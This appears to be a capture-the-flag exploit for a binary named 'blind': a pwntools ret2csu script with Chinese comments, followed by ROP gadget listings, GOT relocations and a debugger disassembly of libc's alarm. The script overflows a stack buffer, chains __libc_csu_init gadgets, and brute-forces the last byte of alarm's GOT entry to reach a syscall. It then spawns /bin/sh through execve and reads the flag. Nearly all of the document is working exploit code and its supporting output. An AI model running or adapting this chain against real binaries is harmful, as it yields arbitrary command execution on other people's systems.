ret2csu

from pwn import *
# context.log_level = 'debug'

#gdb.attach(p, "b*0x400753")
got_read = 0x601020
csu  = 0x04007BA
got_alarm = 0x601018

def csu(pret, rdx, rsi, edi):
 rop = p64(0x04007BA)+p64(0)+p64(1)+p64(pret)+p64(rdx)+p64(rsi)+p64(edi)+p64(0x04007A0)
 return rop
payload = b"a"*0x58+csu(got_read,1,got_alarm,0)+csu(got_read,59,0x601100,0)+csu(got_alarm,0,0,0x601100)
#分三步
#用read改写got_alarm中最后两位(爆破)，
#用read把/bin/sh写入bss段,并且利用这一步size(59,也是0x3b)将调用号写入rdx，为下一步做铺垫(这些就真是经验了)
#再调用alarm函数(改写后实际上调用的execve("/bin/sh"))
payload = payload.ljust(0x500, "\x00")
def exp(i):
  try:
   # p = remote("82.157.6.165", 37500)
   p = process("./blind")
   sleep(1)
   p.send(payload)
   gdb.attach(p)
   raw_input()

   p.send(chr(i))
   print(chr(i))
   p.send("/bin/sh".ljust(59, "\x00"))
   p.sendline("echo lucky")
   p.sendline("echo lucky")
   p.sendline("cat flag")
   if b'lucky' not in p.recv(5, timeout=5):
     raise Exception
   p.interactive()
  except EOFError:
   p.close()
if __name__ == '__main__':
 for i in range(255):
  exp(i)


0x00000000004007bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007be : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007c0 : pop r14 ; pop r15 ; ret
0x00000000004007c2 : pop r15 ; ret
0x00000000004007bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004007bf : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400620 : pop rbp ; ret
0x00000000004007c3 : pop rdi ; ret
0x00000000004007c1 : pop rsi ; pop r15 ; ret
0x00000000004007bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000400549 : ret
0000000000600ff8 R_X86_64_GLOB_DAT  __gmon_start__
0000000000601060 R_X86_64_COPY     stdout@@GLIBC_2.2.5
0000000000601070 R_X86_64_COPY     stdin@@GLIBC_2.2.5
0000000000601080 R_X86_64_COPY     stderr@@GLIBC_2.2.5
0000000000601018 R_X86_64_JUMP_SLOT  alarm@GLIBC_2.2.5
0000000000601020 R_X86_64_JUMP_SLOT  read@GLIBC_2.2.5
0000000000601028 R_X86_64_JUMP_SLOT  __libc_start_main@GLIBC_2.2.5
0000000000601030 R_X86_64_JUMP_SLOT  setvbuf@GLIBC_2.2.5
0000000000601038 R_X86_64_JUMP_SLOT  sleep@GLIBC_2.2.5
0x400560: alarm@plt
0x400570: read@plt
0x400580: __libc_start_main@plt
0x400590: setvbuf@plt
0x4005a0: sleep@plt

pwndbg> x/50i 0x7f6a0a36f280
  0x7f6a0a36f280 <alarm>:	mov    eax,0x25
  0x7f6a0a36f285 <alarm+5>:	syscall         #第二个就是
  0x7f6a0a36f287 <alarm+7>:	cmp    rax,0xfffffffffffff001
  0x7f6a0a36f28d <alarm+13>:	jae    0x7f6a0a36f290 <alarm+16>
  0x7f6a0a36f28f <alarm+15>:	ret    
  0x7f6a0a36f290 <alarm+16>:	mov    rcx,QWORD PTR [rip+0x2f7be1]        # 0x7f6a0a666e78
  0x7f6a0a36f297 <alarm+23>:	neg    eax
  0x7f6a0a36f299 <alarm+25>:	mov    DWORD PTR fs:[rcx],eax
  0x7f6a0a36f29c <alarm+28>:	or     rax,0xffffffffffffffff
  0x7f6a0a36f2a0 <alarm+32>:	ret    
  0x7f6a0a36f2a1:	nop    WORD PTR cs:[rax+rax*1+0x0]
  0x7f6a0a36f2ab:	nop    DWORD PTR [rax+rax*1+0x0]
  0x7f6a0a36f2b0 <__sleep>:	push   rbp
  0x7f6a0a36f2b1 <__sleep+1>:	push   rbx
  0x7f6a0a36f2b2 <__sleep+2>:	mov    eax,edi
  0x7f6a0a36f2b4 <__sleep+4>:	sub    rsp,0x18
  0x7f6a0a36f2b8 <__sleep+8>:	mov    rbx,QWORD PTR [rip+0x2f7bb9]        # 0x7f6a0a666e78
  0x7f6a0a36f2bf <__sleep+15>:	mov    rdi,rsp
  0x7f6a0a36f2c2 <__sleep+18>:	mov    rsi,rsp
  0x7f6a0a36f2c5 <__sleep+21>:	mov    QWORD PTR [rsp+0x8],0x0
  0x7f6a0a36f2ce <__sleep+30>:	mov    QWORD PTR [rsp],rax
  0x7f6a0a36f2d2 <__sleep+34>:	mov    ebp,DWORD PTR fs:[rbx]
  0x7f6a0a36f2d5 <__sleep+37>:	call   0x7f6a0a36f360 <nanosleep>
  0x7f6a0a36f2da <__sleep+42>:	test   eax,eax
  0x7f6a0a36f2dc <__sleep+44>:	js     0x7f6a0a36f2f0 <__sleep+64>
  0x7f6a0a36f2de <__sleep+46>:	mov    DWORD PTR fs:[rbx],ebp
  0x7f6a0a36f2e1 <__sleep+49>:	add    rsp,0x18
  0x7f6a0a36f2e5 <__sleep+53>:	xor    eax,eax
  0x7f6a0a36f2e7 <__sleep+55>:	pop    rbx
  0x7f6a0a36f2e8 <__sleep+56>:	pop    rbp
  0x7f6a0a36f2e9 <__sleep+57>:	ret